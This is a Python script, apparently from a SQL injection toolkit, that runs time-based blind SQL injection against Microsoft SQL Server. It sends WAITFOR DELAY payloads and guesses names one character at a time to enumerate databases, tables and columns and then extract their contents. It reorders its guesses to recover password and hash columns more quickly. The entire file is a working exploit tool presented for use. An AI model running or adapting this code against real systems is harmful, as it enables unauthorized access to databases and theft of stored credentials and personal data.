#!/usr/bin/env python3

from urllib.parse import quote_plus as urlenc
from time import sleep
import sys
import re

from pysqllib.sender import RequestSender
from pysqllib.arguments import MssqlTimeArguments
from pysqllib.commonfunc import *


def is_contain(sender, payload, data):
    if args.p.verbose:
        print_verbose(payload, args.left, args.right)
    else:
        print(f"\r{' ' * (len(data) + 1)}", end='')
        print(f"\r{data}", end='')

    r = sender.send_request(payload)
    if r.elapsed.total_seconds() > args.sleep_sec:
        return True
    else:
        return False


def retr_loop2(sender, payload1, payload2, tab_or_col=False, possible_hash=False):
    # order = 'abcdefghijklmnopqrstuvwxyz0123456789-_'
    # https://en.wikipedia.org/wiki/Letter_frequency
    order = 'etaoinshrdlmcuwfgypbvkjxqz0123456789-_'

    if tab_or_col:
        # + username, password, hash
        order = 'eaoshrdpwunmtilcfgybvkjxqz0123456789-_'

    if possible_hash:
        # order = '0123456789abcdefghijklmnopqrstuvwxyz-_'
        order = '0123456789abcdeftoinshrlmuwgypvkjxqz-_'

    retry = 0
    prev = ''
    result = ''
    while True:
        for c in order:
            payload = payload1 + urlenc(result + c + '%') + payload2
            if is_contain(sender, payload, result + c + '%'):
                result += c
                break

            sleep(args.wait_sec)

        if result == '':
            if retry == 2:
                print("\r   ", end='')
                return ''
            retry += 1
            continue
        elif prev == result:
            print(f"\r{' ' * (len(result) + 1)}\r", end='')
            result = result[:-1]
            continue

        retry = 0
        payload = payload1 + urlenc(result) + payload2
        for i in range(3):
            if not is_contain(sender, payload, result):
                prev = result
                break
            elif i == 2:
                return result


def retr_loop(sender, payload1, payload2, payload3, tab_or_col=False, possible_hash=False):
    result = []
    i = 0
    while True:
        not_in = ','.join([f"'{elem}'" for elem in result]) or "''"
        payload = payload1 + urlenc(not_in) + payload2

        if args.p.verbose:
            print_verbose(payload + payload3, args.left, args.right)

        for _ in range(sender.retry):
            try:
                content = retr_loop2(
                    sender, payload, payload3, tab_or_col, possible_hash)
                if content == '':
                    return result

                result.append(content)
                print(f"\r{i}: {content}")
                sleep(args.wait_sec)
                i += 1
                break
            except KeyboardInterrupt:
                exit(1)
            except:
                sleep(sender.err_wait)
        else:
            raise Exception


def retr_database(sender):
    base = [
        "IF (EXISTS(SELECT TOP 1 name FROM master..sysdatabases WHERE name not in (",
        ") and name like '", "')) WAITFOR DELAY '0:0:" +
        str(args.sleep_sec) + "'"
    ]
    print('databases:')
    payload3 = urlenc("IF (EXISTS(SELECT DB_NAME() WHERE DB_NAME() like '")
    payload4 = urlenc("')) WAITFOR DELAY '0:0:" + str(args.sleep_sec) + "'")
    if args.p.verbose:
        print_verbose(payload3 + payload4, args.left, args.right)
    content = retr_loop2(sender, payload3, payload4)
    print(f"\rcurrent: {content}")

    payload1 = urlenc(base[0])
    payload2 = urlenc(base[1])
    payload3 = urlenc(base[2])
    databases = retr_loop(sender, payload1, payload2, payload3)

    print()
    print(','.join(databases))


def retr_tables(sender, databases):
    print('tables:')

    base = ["IF (EXISTS(SELECT TOP 1 name FROM ",
            "..sysobjects WHERE xtype = 'U' AND name not in (",
            ") and name like '", "')) WAITFOR DELAY '0:0:" + str(args.sleep_sec) + "'"]

    tables = {}
    for db in databases:
        print(f"{db}:")
        payload1 = urlenc(base[0] + db + base[1])
        payload2 = urlenc(base[2])
        payload3 = urlenc(base[3])
        tables[db] = retr_loop(sender, payload1, payload2, payload3, True)

        print()
        print(','.join(tables[db]))
        print()


def retr_columns(sender, databases, tables):
    print('columns:')

    base = ["IF (EXISTS(SELECT TOP 1 ", "..syscolumns.name FROM ",
            "..syscolumns, ", "..sysobjects WHERE ",
            "..syscolumns.id=", "..sysobjects.id AND ",
            "..sysobjects.name='", "' AND ",
            "..syscolumns.name not in (", ") AND ",
            "..syscolumns.name like '",
            "')) WAITFOR DELAY '0:0:" + str(args.sleep_sec) + "'"]

    columns = {}
    for db in databases:
        print(f"{db}:")
        columns[db] = {}
        for tb in tables[db]:
            print(f"*{tb}:")
            payload1 = urlenc(base[0] + db + base[1] + db + base[2] + db +
                              base[3] + db + base[4] + db + base[5] + db +
                              base[6] + tb + base[7] + db + base[8])
            payload2 = urlenc(base[9] + db + base[10])
            payload3 = urlenc(base[11])

            columns[db][tb] = retr_loop(
                sender, payload1, payload2, payload3, True)

            print()
            print(','.join(columns[db][tb]))
            print()


def retr_data(sender, databases, tables, columns):
    print('data:')

    base = ["IF (EXISTS(SELECT TOP 1 ", " FROM ",
            "..", " WHERE ", " not in (", ") and ", " like '",
            "')) WAITFOR DELAY '0:0:" + str(args.sleep_sec) + "'"]
    data = {}
    for db in databases:
        print(f"{db}:")
        data[db] = {}
        for tb in tables[db]:
            print(f"*{tb}:")
            data[db][tb] = {}
            for cl in columns[db][tb]:
                print()
                print(f"**{cl}:")
                payload1 = urlenc(base[0] + cl + base[1] + db +
                                  base[2] + tb + base[3] + cl + base[4])
                payload2 = urlenc(base[5] + cl + base[6])
                payload3 = urlenc(base[7])

                possible_hash = False
                if re.match(r'.*(pass|hash).*', cl):
                    if args.p.verbose:
                        print('debug: hash order enabled', file=sys.stderr)
                    possible_hash = True

                data[db][tb][cl] = retr_loop(
                    sender, payload1, payload2, payload3, possible_hash=possible_hash)

    print_data(databases, tables, columns, data)


def main():
    sender = RequestSender(args)

    if args.command == 'database':
        retr_database(sender)
    elif args.command == 'table':
        retr_tables(sender, args.databases)
    elif args.command == 'column':
        retr_columns(sender, args.databases, args.tables)
    elif args.command == 'data':
        retr_data(sender, args.databases, args.tables, args.columns)
    else:
        print('error: unreachable', file=sys.stderr)


if __name__ == '__main__':
    args = MssqlTimeArguments()
    main()
